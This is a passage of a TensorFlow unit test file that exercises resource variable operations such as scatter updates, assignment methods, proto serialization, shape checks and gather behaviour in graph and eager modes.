resource_variable_ops.resource_scatter_min(
handle, [0], constant_op.constant(3, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
@test_util.run_in_graph_and_eager_modes
def testScatterMaxScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_max(
handle, [0], constant_op.constant(3, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[6]])
@test_util.run_in_graph_and_eager_modes
def testScatterAddVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 1.5], name="add")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_add(ops.IndexedSlices(indices=[1], values=[2.5])))
self.assertAllEqual([0.0, 4.0], self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def testScatterSubVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 2.5], name="sub")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_sub(ops.IndexedSlices(indices=[1], values=[1.5])))
self.assertAllEqual([0.0, 1.0], self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def testScatterMaxVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 4.0], name="max1")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_max(ops.IndexedSlices(indices=[1], values=[5.0])))
self.assertAllEqual([0.0, 5.0], self.evaluate(v))
v = resource_variable_ops.ResourceVariable([0.0, 3.5], name="max2")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_max(ops.IndexedSlices(indices=[1], values=[2.0])))
self.assertAllEqual([0.0, 3.5], self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def testScatterMinVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 4.0], name="min1")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_min(ops.IndexedSlices(indices=[1], values=[5.0])))
self.assertAllEqual([0.0, 4.0], self.evaluate(v))
v = resource_variable_ops.ResourceVariable([0.0, 3.5], name="min2")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_min(ops.IndexedSlices(indices=[1], values=[2.0])))
self.assertAllEqual([0.0, 2.0], self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def testScatterMulVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 4.0], name="mul")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_mul(ops.IndexedSlices(indices=[1], values=[3.0])))
self.assertAllEqual([0.0, 12.0], self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def testScatterDivVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 6.0], name="div")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_div(ops.IndexedSlices(indices=[1], values=[2.0])))
self.assertAllEqual([0.0, 3.0], self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def testScatterUpdateVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 6.0], name="update")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_update(ops.IndexedSlices(indices=[1], values=[3.0])))
self.assertAllEqual([0.0, 3.0], self.evaluate(v))
@test_util.run_deprecated_v1
def testScatterUpdateString(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.string, shape=[1, 1])
self.evaluate(resource_variable_ops.assign_variable_op(
handle, constant_op.constant([["a"]], dtype=dtypes.string)))
self.evaluate(resource_variable_ops.resource_scatter_update(
handle, [0], constant_op.constant([["b"]], dtype=dtypes.string)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.string)
self.assertEqual(compat.as_bytes(self.evaluate(read)[0][0]),
compat.as_bytes("b"))
@test_util.run_deprecated_v1
def testScatterUpdateStringScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.string, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
[["a"]],
dtype=dtypes.string)))
self.evaluate(
resource_variable_ops.resource_scatter_update(handle, [0],
constant_op.constant(
"b",
dtype=dtypes.string)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.string)
self.assertEqual(
compat.as_bytes(self.evaluate(read)[0][0]), compat.as_bytes("b"))
# TODO(alive): get this to work in Eager mode.
def testGPU(self):
with test_util.use_gpu():
abc = variable_scope.get_variable(
"abc",
shape=[1],
initializer=init_ops.ones_initializer(),
use_resource=True)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(
self.evaluate(
resource_variable_ops.var_is_initialized_op(abc.handle)),
True)
def testScatterBool(self):
with context.eager_mode():
ref = resource_variable_ops.ResourceVariable(
[False, True, False], trainable=False)
indices = math_ops.range(3)
updates = constant_op.constant([True, True, True])
state_ops.scatter_update(ref, indices, updates)
self.assertAllEqual(ref.read_value(), [True, True, True])
@test_util.run_in_graph_and_eager_modes
def testConstraintArg(self):
constraint = lambda x: x
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, constraint=constraint, name="var0")
self.assertEqual(v.constraint, constraint)
constraint = 0
with self.assertRaises(ValueError):
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, constraint=constraint, name="var1")
# TODO(alive): how should this work in Eager mode?
@test_util.run_deprecated_v1
def testInitFn(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, dtype=dtypes.float32)
self.assertEqual(v.handle.op.colocation_groups(),
v.initializer.inputs[1].op.colocation_groups())
def testCountUpTo(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(0, name="upto")
self.assertAllEqual(v.count_up_to(1), 0)
with self.assertRaises(errors.OutOfRangeError):
v.count_up_to(1)
def testCountUpToFunction(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(0, name="upto")
self.assertAllEqual(state_ops.count_up_to(v, 1), 0)
with self.assertRaises(errors.OutOfRangeError):
state_ops.count_up_to(v, 1)
@test_util.run_in_graph_and_eager_modes
def testInitFnDtype(self):
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, dtype=dtypes.float32, name="var0")
self.assertEqual(dtypes.float32, v.value().dtype)
@test_util.run_in_graph_and_eager_modes
def testInitFnNoDtype(self):
v = resource_variable_ops.ResourceVariable(initial_value=lambda: 1,
name="var2")
self.assertEqual(dtypes.int32, v.value().dtype)
@test_util.run_in_graph_and_eager_modes
def testInitializeAllVariables(self):
v = resource_variable_ops.ResourceVariable(1, dtype=dtypes.float32,
name="var0")
self.evaluate(variables.global_variables_initializer())
self.assertEqual(1.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
def testOperatorOverload(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.assertEqual(2.0, self.evaluate(v + v))
@test_util.run_in_graph_and_eager_modes
def testAssignMethod(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.evaluate(v.assign(2.0))
self.assertEqual(2.0, self.evaluate(v.value()))
# Tests for the 'read_value' argument:
assign_with_read = v.assign(3.0, read_value=True)
self.assertEqual(3.0, self.evaluate(assign_with_read))
assign_without_read = v.assign(4.0, read_value=False)
if context.executing_eagerly():
self.assertIsNone(assign_without_read)
else:
self.assertIsInstance(assign_without_read, ops.Operation)
self.evaluate(assign_without_read)
self.assertEqual(4.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
def testLoad(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
v.load(2.0)
self.assertEqual(2.0, self.evaluate(v.value()))
def testShapePassedToGradient(self):
with ops.Graph().as_default():
@custom_gradient.custom_gradient
def differentiable_scatter_update(handle, indices, values):
with ops.control_dependencies([
resource_variable_ops.resource_scatter_update(
handle, indices, values)]):
new_handle = array_ops.identity(handle)
def grad(dresult):
self.assertIsNotNone(
tensor_util.constant_value(dresult.dense_shape))
return [dresult, None, None]
return new_handle, grad
var = variable_scope.get_variable(
"foo", shape=[20], initializer=init_ops.zeros_initializer,
dtype=dtypes.float64, use_resource=True)
indices = math_ops.range(10)
updates = math_ops.range(9, -1, -1, dtype=dtypes.float64)
new_handle = differentiable_scatter_update(var.handle, indices, updates)
gathered = resource_variable_ops.resource_gather(
new_handle, indices, dtype=var.dtype)
gradients_impl.gradients([gathered], [updates])
def testToFromProtoCachedValue(self):
with ops.Graph().as_default():
v_def = resource_variable_ops.ResourceVariable(
initial_value=constant_op.constant(3.0)).to_proto()
v_prime = resource_variable_ops.ResourceVariable(variable_def=v_def)
self.assertIsNone(getattr(v_prime, "_cached_value", None))
other_v_def = resource_variable_ops.ResourceVariable(
caching_device="cpu:0",
initial_value=constant_op.constant(3.0)).to_proto()
other_v_prime = resource_variable_ops.ResourceVariable(
variable_def=other_v_def)
self.assertIsNotNone(other_v_prime._cached_value)
def testVariableDefInitializedInstances(self):
with ops.Graph().as_default(), self.cached_session():
v_def = resource_variable_ops.ResourceVariable(
initial_value=constant_op.constant(3.0)).to_proto()
with ops.Graph().as_default(), self.cached_session():
# v describes a VariableDef-based variable without an initial value.
v = resource_variable_ops.ResourceVariable(variable_def=v_def)
self.assertEqual(3.0, self.evaluate(v.initialized_value()))
# initialized_value should not rerun the initializer_op if the variable
# has already been initialized elsewhere.
self.evaluate(v.assign(1.0))
self.assertEqual(1.0, v.initialized_value().eval())
v_def.ClearField("initial_value_name")
with ops.Graph().as_default(), self.cached_session():
# Restoring a legacy VariableDef proto that does not have
# initial_value_name set should still work.
v = resource_variable_ops.ResourceVariable(variable_def=v_def)
# We should also be able to re-export the variable to a new meta graph.
self.assertProtoEquals(v_def, v.to_proto())
# But attempts to use initialized_value will result in errors.
with self.assertRaises(ValueError):
self.evaluate(v.initialized_value())
def testTrainableInProto(self):
with ops.Graph().as_default():
non_trainable_variable = resource_variable_ops.ResourceVariable(
trainable=False,
initial_value=constant_op.constant(10.0))
self.assertEqual(
False,
resource_variable_ops.ResourceVariable(
variable_def=non_trainable_variable.to_proto())
.trainable)
trainable_variable = resource_variable_ops.ResourceVariable(
trainable=True,
initial_value=constant_op.constant(10.0))
self.assertEqual(
True,
resource_variable_ops.ResourceVariable(
variable_def=trainable_variable.to_proto())
.trainable)
@test_util.run_in_graph_and_eager_modes
def testSparseRead(self):
init_value = np.reshape(np.arange(np.power(4, 3)), (4, 4, 4))
v = resource_variable_ops.ResourceVariable(
constant_op.constant(init_value, dtype=dtypes.int32), name="var3")
self.evaluate(variables.global_variables_initializer())
value = self.evaluate(v.sparse_read([0, 3, 1, 2]))
self.assertAllEqual(init_value[[0, 3, 1, 2], ...], value)
@test_util.run_in_graph_and_eager_modes
def testGatherNd(self):
init_value = np.reshape(np.arange(np.power(4, 3)), (4, 4, 4))
v = resource_variable_ops.ResourceVariable(
constant_op.constant(init_value, dtype=dtypes.int32), name="var3")
self.evaluate(variables.global_variables_initializer())
value_op = v.gather_nd([[0, 0], [1, 2], [3, 3]])
self.assertAllEqual([3, 4], value_op.shape)
value = self.evaluate(value_op)
self.assertAllEqual([[0, 1, 2, 3], [24, 25, 26, 27], [60, 61, 62, 63]],
value)
value_op = v.gather_nd([[0, 0, 0], [1, 2, 3], [3, 3, 3]])
self.assertAllEqual([3], value_op.shape)
value = self.evaluate(value_op)
self.assertAllEqual([0, 27, 63], value)
@test_util.run_deprecated_v1
def testToFromProto(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
w = resource_variable_ops.ResourceVariable.from_proto(v.to_proto())
self.assertEqual(2, math_ops.add(w, 1).eval())
self.assertEqual(v._handle, w._handle)
self.assertEqual(v._graph_element, w._graph_element)
@test_util.run_in_graph_and_eager_modes
def testAssignAddMethod(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.evaluate(v.assign_add(1.0))
self.assertEqual(2.0, self.evaluate(v.value()))
# Tests for the 'read_value' argument:
assign_with_read = v.assign_add(1.0, read_value=True)
self.assertEqual(3.0, self.evaluate(assign_with_read))
assign_without_read = v.assign_add(1.0, read_value=False)
if context.executing_eagerly():
self.assertIsNone(assign_without_read)
else:
self.assertIsInstance(assign_without_read, ops.Operation)
self.evaluate(assign_without_read)
self.assertEqual(4.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
def testAssignSubMethod(self):
v = resource_variable_ops.ResourceVariable(3.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.evaluate(v.assign_sub(1.0))
self.assertEqual(2.0, self.evaluate(v.value()))
# Tests for the 'read_value' argument:
assign_with_read = v.assign_sub(1.0, read_value=True)
self.assertEqual(1.0, self.evaluate(assign_with_read))
assign_without_read = v.assign_sub(1.0, read_value=False)
if context.executing_eagerly():
self.assertIsNone(assign_without_read)
else:
self.assertIsInstance(assign_without_read, ops.Operation)
self.evaluate(assign_without_read)
self.assertEqual(0.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
@test_util.run_v1_only("b/120545219")
def testDestroyResource(self):
v = resource_variable_ops.ResourceVariable(3.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.assertEqual(3.0, self.evaluate(v.value()))
self.evaluate(resource_variable_ops.destroy_resource_op(v.handle))
with self.assertRaises(errors.FailedPreconditionError):
self.evaluate(v.value())
# Handle to a resource not actually created.
handle = resource_variable_ops.var_handle_op(dtype=dtypes.int32, shape=[])
# Should raise no exception
self.evaluate(resource_variable_ops.destroy_resource_op(
handle, ignore_lookup_error=True))
@test_util.run_deprecated_v1
def testAssignDifferentShapes(self):
with self.cached_session() as sess, variable_scope.variable_scope(
"foo", use_resource=True):
var = variable_scope.get_variable("x", shape=[1, 1], dtype=dtypes.float32)
placeholder = array_ops.placeholder(dtypes.float32)
assign = var.assign(placeholder)
sess.run(
[assign],
feed_dict={placeholder: np.zeros(shape=[2, 2], dtype=np.float32)})
def testAssignDifferentShapesEagerNotAllowed(self):
with context.eager_mode():
with variable_scope.variable_scope("foo"):
var = variable_scope.get_variable("x", shape=[1, 1],
dtype=dtypes.float32)
with self.assertRaisesRegexp(ValueError,
"Shapes.*and.*are incompatible"):
assign = var.assign(np.zeros(shape=[2, 2]))
self.evaluate(assign)
@test_util.disable_xla("XLA doesn't allow changing shape at assignment, as "
"dictated by tf2xla/xla_resource.cc:SetTypeAndShape")
@test_util.run_in_graph_and_eager_modes
def testAssignDifferentShapesAllowed(self):
var = resource_variable_ops.ResourceVariable(
initial_value=np.zeros(shape=[1, 1]),
shape=tensor_shape.TensorShape(None))
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(np.zeros(shape=[1, 1]), var.read_value())
self.evaluate(var.assign(np.zeros(shape=[2, 2])))
self.assertAllEqual(np.zeros(shape=[2, 2]), var.read_value())
@test_util.run_in_graph_and_eager_modes
def testAssignReturnsVariable(self):
var = resource_variable_ops.ResourceVariable(1.)
self.evaluate(variables.global_variables_initializer())
assigned = var.assign(2.)
self.assertIsInstance(assigned, resource_variable_ops.BaseResourceVariable)
assigned = assigned.assign(3.)
self.assertEqual(self.evaluate(assigned), 3.)
self.assertEqual(self.evaluate(var), 3.)
self.assertEqual(self.evaluate(var.assign_add(1.).assign_add(1.)), 5)
self.assertEqual(self.evaluate(var.assign_sub(1.).assign_sub(1.)), 3)
var = resource_variable_ops.ResourceVariable([1., 2.])
self.evaluate(variables.global_variables_initializer())
slices = ops.IndexedSlices(indices=[1], values=[2])
def assert_eq(tensor, vals):
self.assertAllEqual(self.evaluate(tensor), vals)
assert_eq(var.scatter_add(slices).scatter_add(slices), [1., 6.])
assert_eq(var.scatter_sub(slices).scatter_sub(slices), [1., 2.])
slices2 = ops.IndexedSlices(indices=[0], values=[3])
assert_eq(var.scatter_max(slices2).scatter_add(slices), [3., 4.])
assert_eq(var.scatter_add(slices).scatter_min(slices), [3., 2.])
assert_eq(var.scatter_mul(slices).scatter_mul(slices), [3., 8.])
assert_eq(var.scatter_div(slices).scatter_div(slices), [3., 2.])
assert_eq(
var.scatter_nd_update([[1]], [4.]).scatter_nd_add([[0]], [2.])
.scatter_nd_sub([[1]], [3]),
[5., 1.])
assert_eq(var, [5., 1.])
batch_var = resource_variable_ops.ResourceVariable(array_ops.ones((2, 2)))
self.evaluate(variables.global_variables_initializer())
batch_slices1 = ops.IndexedSlices(indices=[[1], [0]], values=[[2], [2]])
batch_slices2 = ops.IndexedSlices(indices=[[1], [1]], values=[[3], [3]])
assert_eq(
batch_var.batch_scatter_update(batch_slices1)
.batch_scatter_update(batch_slices2),
[[1, 3], [2, 3]])
@test_util.run_in_graph_and_eager_modes
def testInitValueWrongShape(self):
with self.assertRaisesWithPredicateMatch(
ValueError, r"not compatible with"):
var = resource_variable_ops.ResourceVariable(
initial_value=np.zeros(shape=[3]),
shape=[4])
self.evaluate(variables.global_variables_initializer())
self.evaluate(var.read_value())
@test_util.run_deprecated_v1
def testDtypeAfterFromProto(self):
v = resource_variable_ops.ResourceVariable(2.0)
w = resource_variable_ops.ResourceVariable.from_proto(v.to_proto())
self.assertIsInstance(w.dtype, dtypes.DType)
self.assertEqual(v.dtype, w.dtype)
# TODO(alive): get caching to work in eager mode.
@test_util.run_deprecated_v1
def testCachingDevice(self):
with ops.device("/job:server/task:1"):
v = resource_variable_ops.ResourceVariable(
2.0, caching_device="/job:localhost")
self.assertEqual("/job:localhost", v.value().device)
with self.assertRaises(ValueError):
_ = v.value().op.get_attr("_class")
with ops.colocate_with(v.op):
w = resource_variable_ops.ResourceVariable(
2.0, caching_device="/job:localhost")
self.assertEqual("/job:localhost", w.value().device)
with self.assertRaises(ValueError):
_ = w.value().op.get_attr("_class")
@test_util.run_deprecated_v1
def testSharedName(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(300.0, name="var4")
self.evaluate(variables.global_variables_initializer())
w = resource_variable_ops.var_handle_op(
dtype=v.dtype.base_dtype, shape=v.get_shape(), shared_name="var4",
# Needed in Eager since we get a unique container name by default.
container=ops.get_default_graph()._container)
w_read = resource_variable_ops.read_variable_op(w, v.dtype.base_dtype)
self.assertEqual(300.0, self.evaluate(w_read))
x = resource_variable_ops.var_handle_op(
dtype=v.dtype.base_dtype, shape=v.get_shape(), shared_name="var5",
container=ops.get_default_graph()._container)
with self.assertRaisesOpError(
"(Resource .*/var5/.* does not exist|Read of uninitialized variable)"
):
resource_variable_ops.read_variable_op(x, v.dtype.base_dtype).eval()
@test_util.run_deprecated_v1
def testSharedNameWithNamescope(self):
with self.cached_session():
with ops.name_scope("foo"):
v = resource_variable_ops.ResourceVariable(300.0, name="var6")
self.assertEqual("foo/var6", v._shared_name) # pylint: disable=protected-access
self.assertEqual("foo/var6:0", v.name)
self.evaluate(variables.global_variables_initializer())
w = resource_variable_ops.var_handle_op(
dtype=v.dtype.base_dtype, shape=v.get_shape(), shared_name="foo/var6",
# Needed in Eager since we get a unique container name by default.
container=ops.get_default_graph()._container)
w_read = resource_variable_ops.read_variable_op(w, v.dtype.base_dtype)
self.assertEqual(300.0, self.evaluate(w_read))
@test_util.run_in_graph_and_eager_modes
def testShape(self):
v = resource_variable_ops.ResourceVariable(
name="var4", initial_value=array_ops.ones(shape=[10, 20, 35]))
self.assertEqual("(10, 20, 35)", str(v.shape))
self.assertEqual("(10, 20, 35)", str(v.get_shape()))
self.assertEqual("(10, 20, 35)", str(v.value().shape))
self.assertEqual("(3, 20, 35)", str(v.sparse_read([0, 1, 2]).shape))
if not context.executing_eagerly():
self.assertEqual(
"<unknown>",
str(v.sparse_read(array_ops.placeholder(dtypes.int32)).shape))
@test_util.run_deprecated_v1
def testSetInitialValue(self):
with self.cached_session():
# Initialize variable with a value different from the initial value passed
# in the constructor.
v = resource_variable_ops.ResourceVariable(2.0)
v.initializer.run(feed_dict={v.initial_value: 3.0})
self.assertEqual(3.0, v.value().eval())
@test_util.run_v1_only("b/120545219")
def testControlFlowInitialization(self):
"""Expects an error if an initializer is in a control-flow scope."""
def cond(i, _):
return i < 10
def body(i, _):
zero = array_ops.zeros([], dtype=dtypes.int32)
v = resource_variable_ops.ResourceVariable(initial_value=zero)
return (i + 1, v.read_value())
with self.assertRaisesRegexp(ValueError, "initializer"):
control_flow_ops.while_loop(cond, body, [0, 0])
def testVariableEager(self):
with context.eager_mode():
init = array_ops.ones(shape=[10, 20, 35], dtype=dtypes.int32)
constraint = lambda x: x
with ops.name_scope("foo", skip_on_eager=False):
v = resource_variable_ops.ResourceVariable(
name="var7",
initial_value=init,
caching_device="cpu:0",
constraint=constraint)
# Test properties
self.assertEqual(dtypes.int32, v.dtype)
self.assertEqual("foo/var7:0", v.name)
self.assertAllEqual([10, 20, 35], v.shape.as_list())
self.assertIsInstance(v.handle, ops.EagerTensor)
self.assertEqual(constraint, v.constraint)
self.assertAllEqual(init.numpy(), v.read_value().numpy())
self.assertAllEqual(init.numpy(), v.value().numpy())
# Callable init.
callable_init = lambda: init * 2
v2 = resource_variable_ops.ResourceVariable(
initial_value=callable_init, name="var7")
self.assertEqual("var7:0", v2.name)
self.assertAllEqual(2 * init.numpy(), v2.read_value().numpy())
# Test assign_add.
new_v2_val = v2.assign_add(v.read_value())
self.assertAllEqual(v.read_value().numpy() * 3, new_v2_val.numpy())
# Test assign_sub.
new_v2_val = v2.assign_sub(v.read_value())
self.assertAllEqual(v.read_value().numpy() * 2, new_v2_val.numpy())
# Test assign.
v2.assign(v.read_value())
self.assertAllEqual(v.read_value().numpy(), v2.read_value().numpy())
# Test load
v2.load(2 * v.read_value())
self.assertAllEqual(2 * v.read_value().numpy(), v2.read_value().numpy())
# Test convert_to_tensor
t = ops.convert_to_tensor(v)
self.assertAllEqual(t.numpy(), v.read_value().numpy())
# Test operations
self.assertAllEqual((v * 2).numpy(), (v + v).numpy())
def testContainerEager(self):
with context.eager_mode():
v1 = resource_variable_ops.ResourceVariable(initial_value=lambda: 1,
name="same")
with ops.container("different"):
v2 = resource_variable_ops.ResourceVariable(initial_value=lambda: 0,
name="same")
v2.assign(2)
self.assertEqual(1, v1.read_value().numpy())
self.assertEqual(2, v2.read_value().numpy())
def testDestruction(self):
with context.eager_mode():
var = resource_variable_ops.ResourceVariable(initial_value=1.0,
name="var8")
var_handle = var._handle
del var
with self.assertRaisesRegexp(errors.NotFoundError,
r"Resource .* does not exist."):
resource_variable_ops.destroy_resource_op(var_handle,
ignore_lookup_error=False)
def testScatterUpdate(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="update")
state_ops.scatter_update(v, [1], [3.0])
self.assertAllEqual([1.0, 3.0], v.numpy())
def testScatterAddStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="add")
state_ops.scatter_add(v, [1], [3])
self.assertAllEqual([1.0, 5.0], v.numpy())
def testScatterSubStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="sub")
state_ops.scatter_sub(v, [1], [3])
self.assertAllEqual([1.0, -1.0], v.numpy())
def testScatterUpdateVariant(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([
list_ops.empty_tensor_list(
element_dtype=dtypes.float32, element_shape=[])
])
v.scatter_update(
ops.IndexedSlices(
list_ops.tensor_list_from_tensor([1., 2.], element_shape=[]), 0))
self.assertAllEqual(
list_ops.tensor_list_get_item(v[0], 0, element_dtype=dtypes.float32),
1.)
def testGroupDoesntForceRead(self):
with ops.Graph().as_default():
v = resource_variable_ops.ResourceVariable(1.0)
assign = v.assign_add(1.0)
g = control_flow_ops.group([assign])
self.assertEqual(g.control_inputs[0].type, "AssignAddVariableOp")
def testScatterNdAddStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(
[1, 2, 3, 4, 5, 6, 7, 8], dtype=dtypes.float32, name="add")
indices = constant_op.constant([[4], [3], [1], [7]], dtype=dtypes.int32)
updates = constant_op.constant([9, 10, 11, 12], dtype=dtypes.float32)
expected = np.array([1, 13, 3, 14, 14, 6, 7, 20])
state_ops.scatter_nd_add(v, indices, updates)
self.assertAllClose(expected, v.numpy())
@test_util.run_in_graph_and_eager_modes
def testUnreadVariableInsideFunction(self):
v = resource_variable_ops.ResourceVariable(1.0)
@def_function.function
def assign():
v.assign(1.0)
graph = assign.get_concrete_function().graph
self.assertTrue(all(x.type != "ReadVariableOp"
for x in graph.get_operations()))
def testScatterNdSubStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(
[1, 2, 3, 4, 5, 6, 7, 8], dtype=dtypes.float32, name="sub")
indices = constant_op.constant([[4], [3], [1], [7]], dtype=dtypes.int32)
updates = constant_op.constant([9, 10, 11, 12], dtype=dtypes.float32)
expected = np.array([1, -9, 3, -6, -4, 6, 7, -4])
state_ops.scatter_nd_sub(v, indices, updates)
self.assertAllClose(expected, v.numpy())
def testScatterUpdateCast(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="update")
state_ops.scatter_update(v, [1], [3])
self.assertAllEqual([1.0, 3.0], v.numpy())
@test_util.run_in_graph_and_eager_modes
def testScatterUpdateInvalidArgs(self):
v = resource_variable_ops.ResourceVariable([0, 1, 2, 3], name="update")
# The exact error and message differ between graph construction (where the
# error is realized during shape inference at graph construction time) and
# eager execution (where the error is realized during kernel execution).
with self.assertRaisesRegexp(Exception, r"shape.*2.*3"):
state_ops.scatter_update(v, [0, 1], [0, 1, 2])
@test_util.run_in_graph_and_eager_modes
def testAssignIncompatibleShape(self):
v = resource_variable_ops.ResourceVariable([0, 1, 2, 3])
self.evaluate(v.initializer)
pattern = re.compile("shapes must be equal", re.IGNORECASE)
with self.assertRaisesRegexp(Exception, pattern):
self.evaluate(v.assign_add(1))
@test_util.run_in_graph_and_eager_modes
@test_util.run_v1_only("b/120545219")
def testCopyToGraphUninitialized(self):
v = resource_variable_ops.ResourceVariable([0, 1, 2, 3])
copy_to_graph = ops.Graph()
with copy_to_graph.as_default(): # Intentionally testing v1 behavior
copied = resource_variable_ops.copy_to_graph_uninitialized(v)
self.assertEqual(v.name, copied.name)
self.assertIsNone(copied.initializer)
def create_variant_shape_and_type_data(self):
variant_shape_and_type_data = (
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleData())
variant_shape_and_type_data.is_set = True
stored_shape = tensor_shape.TensorShape([None, 4]).as_proto()
stored_dtype = dtypes.float32.as_datatype_enum
# NOTE(ebrevdo): shape_and_type lacks append() in some versions of protobuf.
variant_shape_and_type_data.shape_and_type.extend([
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleShapeAndType(
shape=stored_shape, dtype=stored_dtype)])
return variant_shape_and_type_data
@def_function.function
def create_constant_variant(self, value):
value = constant_op.constant(
tensor_pb2.TensorProto(
dtype=dtypes.variant.as_datatype_enum,
tensor_shape=tensor_shape.TensorShape([]).as_proto(),
variant_val=[
tensor_pb2.VariantTensorDataProto(
# Match registration in variant_op_registry.cc
type_name=b"int",
metadata=np.array(value, dtype=np.int32).tobytes())
]))
return value
# TODO(ebrevdo): Add run_in_graph_and_eager_modes once we can create
# EagerTensor constants with TensorProto inputs.
@test_util.run_in_graph_and_eager_modes()
def testVariantInitializer(self):
variant_shape_and_type_data = self.create_variant_shape_and_type_data()
value = self.create_constant_variant(3)
initializer = array_ops.fill([3], value)
resource_variable_ops._set_handle_shapes_and_types( # pylint: disable=protected-access
initializer, variant_shape_and_type_data,
graph_mode=not context.executing_eagerly())
v = resource_variable_ops.ResourceVariable(initializer)
read = array_ops.identity(v)
read_variant_shape_and_type = (
resource_variable_ops.get_eager_safe_handle_data(read))
self.assertEqual(
read_variant_shape_and_type, variant_shape_and_type_data)
gather = v.sparse_read([0])
gather_variant_shape_and_type = (
resource_variable_ops.get_eager_safe_handle_data(gather))
self.assertEqual(
gather_variant_shape_and_type, variant_shape_and_type_data)
# Make sure initializer runs.
if not context.executing_eagerly():
self.evaluate(v.initializer)
self.evaluate(read.op)
self.evaluate(gather.op)
@parameterized.parameters([
# batch_dims=0 (equivalent to tf.gather)
dict( # 2D indices
batch_dims=0,
params=[6, 7, 8, 9],
indices=[[2, 1], [0, 3]],
expected=[[8, 7], [6, 9]]),
dict( # 3D indices
batch_dims=0,
params=[6, 7, 8, 9],
indices=[[[3, 1], [2, 0]], [[0, 3], [2, 2]]],
expected=[[[9, 7], [8, 6]], [[6, 9], [8, 8]]]),
dict( # 4D indices
batch_dims=0,
params=[8, 9],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[8, 9], [9, 8]], [[8, 8], [9, 9]]],
[[[9, 9], [8, 8]], [[8, 9], [9, 8]]]]),
# batch_dims=indices.shape.ndims - 1 (equivalent to
# tf.compat.v1.batch_gather)
dict( # 2D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[2, 1], [0, 3]],
expected=[[12, 11], [20, 23]]),
dict( # 3D indices (2 batch dims)
batch_dims=2,
params=[[[100, 101], [110, 111]], [[200, 201], [210, 211]]],
indices=[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
expected=[[[100, 101], [111, 110]], [[200, 200], [211, 211]]]),
dict( # 2D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[2, 1], [0, 3]],
expected=[[12, 11], [20, 23]]),
dict( # 3D indices (2 batch dims)
batch_dims=2,
